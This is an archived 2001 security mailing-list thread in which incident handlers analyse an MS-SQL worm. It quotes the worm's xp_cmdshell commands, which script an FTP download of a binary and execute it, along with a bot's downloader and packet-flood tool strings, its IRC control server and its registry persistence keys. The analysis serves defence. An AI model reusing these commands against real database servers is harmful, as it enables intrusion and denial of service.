Re: MS-SQL Worm?

From: Johannes Verelst (incidentsat_private)
Date: Tue Nov 20 2001 - 11:11:20 PST

  • Next message: Arthur Donkers: "Re: MS-SQL Worm?"

    On Tue, 20 Nov 2001, Patrick Andry wrote:
    
    > Apparently the file is no longer available on the ftp server.
    > Hopefully this worm is short-lived.
    
    The strange thing about this 'worm' is that it is totally dependant on
    several central servers. Firstly, the FTP server where the files are
    retrieved, secondly the IRC server (that has been slashdottet now
    apparently).
    
    With Nimda, the tftp transfer was made from the infected to the infecting
    host. I am not trying to give advice on writing worms, but that is
    obviously a much better design. This worm will not spread massively since
    the servers it is depandant on are down within hours.
    
    Just my 2 eurocents,
    
    Johannes
    
    > Arthur Donkers wrote:
    >
    > >Hi All,
    > >
    > >Analysed it a bit further (thanks to VMware and netmonitor) and
    > >once it is started it connects to an irc server at bots.kujikiri.net,
    > >port 6669. From the rest of the capture it seems it drops a message
    > >there with the name of the machine it compromised and a password
    > >like string.
    > >
    > >It furthermore (see strings output on executable, scan for registry
    > >keys) adds itself to the Run entry in the registry so it is started
    > >each time the machine is booted. A few of the registry keys:
    > >
    > >
    > >SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TaskReg
    > >
    > >SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\ProtocolOrder
    > >
    > >SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\DSQUERY
    > >
    > >From the strings output it seems to contain a scanner (sm6 ..) that
    > >will scan for new vulnerable machines. I'm not quite sure if and so,
    > >how, it is controlled from the IRC channel. I've tested it on our
    > >testing network so I'm not quite sure yet.
    > >
    > >I've attached the netmon capture file to this message.
    > >
    > >grtz,
    > >
    > >Arthur
    > >
    > >On Tue, 20 Nov 2001, Paul Nasrat wrote:
    > >
    > >>On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote:
    > >>
    > >>>We saw a scan come in looking for systems answering on 1433, and
    > >>>immediately saw several systems start scanning out for other systems
    > >>>answering on 1433 - worm behavior?  Has anyone else seen this?
    > >>>
    > >>No, but the binaries it downloads:
    > >>
    > >>win32mon.exe and dnsservice.exe
    > >>
    > >>Are on the ftp site in the dump.  I don't have a windows debugger to put
    > >>them through but they look interesting:
    > >>
    > >>exec xp_cmdshell 'start dnsservice.exe'
    > >>exec xp_cmdshell 'del ftp.x'
    > >>exec xp_cmdshell 'ftp -s:ftp.x
    > >>exec xp_cmdshell 'echo quit >> ftp.x'
    > >>exec xp_cmdshell 'echo close >> ftp.x'
    > >>exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x'
    > >>exec xp_cmdshell 'echo cd tmp>> ftp.x'
    > >>exec xp_cmdshell 'echo cd pub>> ftp.x'
    > >>exec xp_cmdshell 'echo bin>> ftp.x'
    > >>exec xp_cmdshell 'echo foo.com>> ftp.x'
    > >>exec xp_cmdshell 'echo ftp> ftp.x'
    > >>
    > >>GET /%s HTTP/1.0
    > >>Connection: Keep-Alive
    > >>User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
    > >>[GET] - Unable to connect to http.
    > >>[GET] - Unable to resolve host.
    > >>http://
    > >>[GET] - Unable to create new socket.
    > >>GET <bot|wildcard> <host> <save as>
    > >>%s %s %s %s
    > >>NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu)
    > >>NICK %s
    > >>NOTICE %s :Nick cannot be larger than 9 characters.
    > >>NOTICE %s :NICK <nick>
    > >>sm6 has finished...
    > >>with tcp/syn boost!
    > >>sm6 icmp/udp has begun...
    > >>sm6 icmp/udp (w/pkt-push!) has begun..
    > >>Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src
    > >>port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t
    > >>include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file>
    > >>
    > >>etc.
    > >>
    > >>Paul Nasrat
    > >>
    > >>----------------------------------------------------------------------------
    > >>This list is provided by the SecurityFocus ARIS analyzer service.
    > >>For more information on this free incident handling, management
    > >>and tracking system please see: http://aris.securityfocus.com
    > >>
    > >
    > >
    > >------------------------------------------------------------------------
    > >
    > >----------------------------------------------------------------------------
    > >This list is provided by the SecurityFocus ARIS analyzer service.
    > >For more information on this free incident handling, management
    > >and tracking system please see: http://aris.securityfocus.com
    > >
    >
    >
    >
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    >
    
    -- 
    "Programming today is a race between software engineers striving to build
    bigger and better idiot-proof programs, and the Universe trying to produce
    bigger and better idiots. So far, the Universe is winning."
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 11:15:21 PST